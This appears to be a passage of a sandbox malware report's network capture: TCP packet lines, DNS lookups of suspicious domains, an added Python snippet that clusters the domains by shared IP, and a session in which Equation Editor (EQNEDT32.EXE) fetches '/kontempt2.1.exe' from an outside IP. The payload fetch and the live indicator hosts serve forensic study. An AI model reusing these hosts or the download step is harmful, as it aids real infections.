                                                                          Oct 22, 2024 15:01:39.930864096 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.930875063 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.931588888 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.931605101 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.931622028 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.931627035 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.931627035 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.931638002 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.931643009 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.931655884 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.931674957 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.932374001 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.932390928 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.932406902 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.932414055 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.932424068 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.932441950 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.933159113 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.933176041 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.933190107 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.933202982 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.933202982 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.933218956 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.933971882 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.933995962 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.934010983 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.934025049 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.934027910 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.934034109 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.934041977 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.934062004 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.934715033 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.934731960 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.934743881 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.934758902 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.934758902 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.934760094 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.934775114 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.934830904 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.935062885 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.935478926 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.935497046 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.935525894 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.935575008 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.938514948 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.938564062 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.938676119 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.938693047 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.938716888 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.938790083 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.939193964 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.939210892 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.939237118 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.939249039 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.939542055 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.939558983 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.939574957 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.939589977 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.939589977 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.939603090 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.940330982 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.940347910 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.940361977 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.940372944 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.940382004 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.940382957 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.940399885 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.940419912 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.941082954 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.941099882 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.941114902 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.941123962 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.941131115 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.941149950 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.941867113 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.941886902 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.941901922 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.941912889 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.941912889 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.941926956 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.942495108 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.942642927 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.942661047 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.942677021 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.942693949 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.942699909 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.942699909 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.942708969 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.942717075 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.942734957 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.942743063 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.943795919 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.943813086 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.943829060 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.943842888 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.943842888 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.943857908 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.944176912 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.944194078 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.944210052 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.944215059 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.944221020 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.944226980 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.944242001 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.944262981 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.944885969 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.944904089 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.944936037 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.944952011 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.015702963 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.015743017 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.015755892 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.015877962 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.015877962 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.015912056 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.015929937 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.015944958 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.015954018 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.015968084 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.015975952 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.016583920 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.016621113 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.016762018 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.016779900 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.016796112 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.016799927 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.016819954 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.016829967 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.017482996 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.017498970 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.017513037 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.017529011 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.017529011 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.017529011 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.017560959 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.017560959 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.018270016 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.018285990 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.018301010 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:40.018311024 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.018331051 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:40.018331051 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:02:03.908025980 CEST4916980192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:03.914115906 CEST80491693.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:03.914222956 CEST4916980192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:03.923171043 CEST4916980192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:03.929449081 CEST80491693.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:03.929465055 CEST80491693.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:03.929507971 CEST4916980192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:04.186081886 CEST80491693.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:04.557157993 CEST80491693.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:04.557257891 CEST4916980192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:05.437454939 CEST4916980192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:05.443146944 CEST80491693.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:06.454708099 CEST4917080192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:06.460326910 CEST80491703.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:06.460412979 CEST4917080192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:06.471586943 CEST4917080192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:06.477127075 CEST80491703.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:07.093274117 CEST80491703.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:07.093344927 CEST4917080192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:07.980299950 CEST4917080192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:07.985760927 CEST80491703.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:08.998111010 CEST4917180192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:09.003830910 CEST80491713.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:09.003921986 CEST4917180192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:09.019007921 CEST4917180192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:09.024457932 CEST80491713.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:09.024539948 CEST80491713.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:09.024575949 CEST4917180192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:09.029854059 CEST80491713.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:09.030034065 CEST80491713.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:09.633546114 CEST80491713.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:09.633718014 CEST4917180192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:10.522953033 CEST4917180192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:10.528345108 CEST80491713.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:11.540288925 CEST4917280192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:11.545936108 CEST80491723.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:11.546027899 CEST4917280192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:11.558645964 CEST4917280192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:11.564243078 CEST80491723.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:12.179976940 CEST80491723.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:12.180834055 CEST80491723.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:12.181061983 CEST4917280192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:12.183023930 CEST4917280192.168.2.223.33.130.190
                                                                          Oct 22, 2024 15:02:12.188352108 CEST80491723.33.130.190192.168.2.22
                                                                          Oct 22, 2024 15:02:17.218152046 CEST4917380192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:17.223527908 CEST804917315.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:17.223633051 CEST4917380192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:17.239753962 CEST4917380192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:17.245239019 CEST804917315.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:17.245250940 CEST804917315.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:17.245318890 CEST4917380192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:17.250643969 CEST804917315.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:18.744219065 CEST4917380192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:18.770209074 CEST804917315.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:18.770349026 CEST4917380192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:19.760921001 CEST4917480192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:19.766562939 CEST804917415.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:19.766629934 CEST4917480192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:19.776103020 CEST4917480192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:19.781461954 CEST804917415.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:20.407773018 CEST804917415.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:20.407910109 CEST4917480192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:21.287113905 CEST4917480192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:21.598858118 CEST4917480192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:21.687621117 CEST804917415.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:21.687637091 CEST804917415.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:21.687786102 CEST4917480192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:22.310520887 CEST4917580192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:22.316428900 CEST804917515.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:22.316488981 CEST4917580192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:22.326925993 CEST4917580192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:22.332289934 CEST804917515.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:22.332348108 CEST4917580192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:22.332532883 CEST804917515.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:22.337651014 CEST804917515.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:22.337770939 CEST804917515.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:23.829933882 CEST4917580192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:23.835721970 CEST804917515.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:23.836422920 CEST4917580192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:24.852859020 CEST4917680192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:24.858555079 CEST804917615.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:24.859339952 CEST4917680192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:24.866843939 CEST4917680192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:24.872502089 CEST804917615.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:25.498353958 CEST804917615.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:25.499103069 CEST804917615.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:25.499209881 CEST4917680192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:25.515455008 CEST4917680192.168.2.2215.197.148.33
                                                                          Oct 22, 2024 15:02:25.520900965 CEST804917615.197.148.33192.168.2.22
                                                                          Oct 22, 2024 15:02:27.870326996 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:02:27.876749992 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:02:27.876823902 CEST4916480192.168.2.2245.33.6.223
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 22, 2024 15:00:45.794792891 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Oct 22, 2024 15:00:45.803292990 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Oct 22, 2024 15:01:33.658576965 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Oct 22, 2024 15:01:33.670391083 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Oct 22, 2024 15:01:38.660665989 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Oct 22, 2024 15:01:38.814579964 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Oct 22, 2024 15:01:38.815045118 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Oct 22, 2024 15:01:38.822830915 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Oct 22, 2024 15:01:49.766463995 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Oct 22, 2024 15:01:50.059843063 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Oct 22, 2024 15:02:03.897742987 CEST | 54821 | 53 | 192.168.2.22 | 8.8.8.8
Oct 22, 2024 15:02:03.905828953 CEST | 53 | 54821 | 8.8.8.8 | 192.168.2.22
Oct 22, 2024 15:02:17.199229956 CEST | 54719 | 53 | 192.168.2.22 | 8.8.8.8
Oct 22, 2024 15:02:17.211153030 CEST | 53 | 54719 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 22, 2024 15:00:45.794792891 CEST | 192.168.2.22 | 8.8.8.8 | 0x8091 | Standard query (0) | timurtrading.my | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:01:33.658576965 CEST | 192.168.2.22 | 8.8.8.8 | 0xfbf2 | Standard query (0) | www.omnibizlux.biz | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:01:38.660665989 CEST | 192.168.2.22 | 8.8.8.8 | 0x659c | Standard query (0) | www.sqlite.org | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:01:38.815045118 CEST | 192.168.2.22 | 8.8.8.8 | 0x659c | Standard query (0) | www.sqlite.org | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:01:49.766463995 CEST | 192.168.2.22 | 8.8.8.8 | 0x735e | Standard query (0) | www.75e296qdx.top | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:02:03.897742987 CEST | 192.168.2.22 | 8.8.8.8 | 0x1a06 | Standard query (0) | www.myprefpal.xyz | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:02:17.199229956 CEST | 192.168.2.22 | 8.8.8.8 | 0x6565 | Standard query (0) | www.jilifish.win | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 22, 2024 15:00:45.803292990 CEST | 8.8.8.8 | 192.168.2.22 | 0x8091 | No error (0) | timurtrading.my | - | 192.3.255.145 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:01:33.670391083 CEST | 8.8.8.8 | 192.168.2.22 | 0xfbf2 | No error (0) | www.omnibizlux.biz | - | 167.172.133.32 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:01:38.814579964 CEST | 8.8.8.8 | 192.168.2.22 | 0x659c | No error (0) | www.sqlite.org | - | 45.33.6.223 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:01:38.822830915 CEST | 8.8.8.8 | 192.168.2.22 | 0x659c | No error (0) | www.sqlite.org | - | 45.33.6.223 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:01:50.059843063 CEST | 8.8.8.8 | 192.168.2.22 | 0x735e | No error (0) | www.75e296qdx.top | - | 185.196.10.234 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:02:03.905828953 CEST | 8.8.8.8 | 192.168.2.22 | 0x1a06 | No error (0) | www.myprefpal.xyz | myprefpal.xyz | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 22, 2024 15:02:03.905828953 CEST | 8.8.8.8 | 192.168.2.22 | 0x1a06 | No error (0) | myprefpal.xyz | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:02:03.905828953 CEST | 8.8.8.8 | 192.168.2.22 | 0x1a06 | No error (0) | myprefpal.xyz | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:02:17.211153030 CEST | 8.8.8.8 | 192.168.2.22 | 0x6565 | No error (0) | www.jilifish.win | jilifish.win | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 22, 2024 15:02:17.211153030 CEST | 8.8.8.8 | 192.168.2.22 | 0x6565 | No error (0) | jilifish.win | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 15:02:17.211153030 CEST | 8.8.8.8 | 192.168.2.22 | 0x6565 | No error (0) | jilifish.win | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                                          • timurtrading.my
                                                                          • www.omnibizlux.biz
                                                                          • www.sqlite.org
                                                                          • www.75e296qdx.top
                                                                          • www.myprefpal.xyz
                                                                          • www.jilifish.win
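
Two of the looked-up names, www.myprefpal.xyz and www.jilifish.win, both resolve via a CNAME to the same pair of A records, 3.33.130.190 and 15.197.148.33, and the TCP list above shows the sample then contacting exactly those two addresses in turn on ports 49169 through 49176. The pivot an analyst runs on an answer table like this is to rebuild the RRsets, follow the CNAME chains and group the queried names by shared address. The snippet below is an added example and is not part of the Joe Sandbox report: the record list is constructed from the answer rows above, and the helper names are mine.

```python
"""Follow CNAME chains and cluster queried names by shared A record.

Added example, not part of the Joe Sandbox report. ANSWERS is constructed
from the DNS answer table above; function names are this example's own.
"""
from __future__ import annotations

from collections import defaultdict

# (transaction id, owner name, rrtype, rdata), transcribed from the answer rows.
ANSWERS = [
    (0x8091, "timurtrading.my", "A", "192.3.255.145"),
    (0xfbf2, "www.omnibizlux.biz", "A", "167.172.133.32"),
    (0x659c, "www.sqlite.org", "A", "45.33.6.223"),
    (0x735e, "www.75e296qdx.top", "A", "185.196.10.234"),
    (0x1a06, "www.myprefpal.xyz", "CNAME", "myprefpal.xyz"),
    (0x1a06, "myprefpal.xyz", "A", "3.33.130.190"),
    (0x1a06, "myprefpal.xyz", "A", "15.197.148.33"),
    (0x6565, "www.jilifish.win", "CNAME", "jilifish.win"),
    (0x6565, "jilifish.win", "A", "15.197.148.33"),
    (0x6565, "jilifish.win", "A", "3.33.130.190"),
]


def build_rrsets(answers):
    """Group rdata by owner name and type, lower-casing names (DNS is case-insensitive)."""
    rrsets = defaultdict(lambda: {"CNAME": set(), "A": set()})
    for _, name, rrtype, rdata in answers:
        rrsets[name.lower()][rrtype].add(rdata)
    return rrsets


def resolve(name, rrsets, max_depth=8):
    """Return the A records for name, following CNAMEs breadth-first.

    max_depth bounds the walk so a CNAME loop in hostile data cannot hang us.
    """
    seen, frontier, addrs = set(), {name.lower()}, set()
    for _ in range(max_depth):
        if not frontier:
            break
        nxt = set()
        for n in frontier:
            if n in seen:
                continue
            seen.add(n)
            rs = rrsets.get(n)  # .get() so the defaultdict is not mutated
            if rs is None:
                continue
            addrs |= rs["A"]
            nxt |= {c.lower() for c in rs["CNAME"]}
        frontier = nxt
    return addrs


def queried_names(answers):
    """Owner names the client actually asked for: everything that is not a CNAME target."""
    targets = {rdata.lower() for _, _, t, rdata in answers if t == "CNAME"}
    return sorted({n.lower() for _, n, _, _ in answers} - targets)


def shared_infrastructure(answers):
    """Map IP -> queried names resolving to it, keeping only IPs shared by more than one name."""
    rrsets = build_rrsets(answers)
    by_ip = defaultdict(set)
    for name in queried_names(answers):
        for ip in resolve(name, rrsets):
            by_ip[ip].add(name)
    return {ip: names for ip, names in by_ip.items() if len(names) > 1}


if __name__ == "__main__":
    for ip, names in sorted(shared_infrastructure(ANSWERS).items()):
        print(ip, "<-", ", ".join(sorted(names)))
```

On the rows above this reports the two addresses shared by www.myprefpal.xyz and www.jilifish.win and nothing for www.sqlite.org or the other single-address names; the legitimate sqlite.org download and the contacted domains separate cleanly on this axis.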
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49161 | 192.3.255.145 | 80 | 3448 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 15:00:45.822179079 CEST | 317 | OUT | GET /kontempt2.1.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
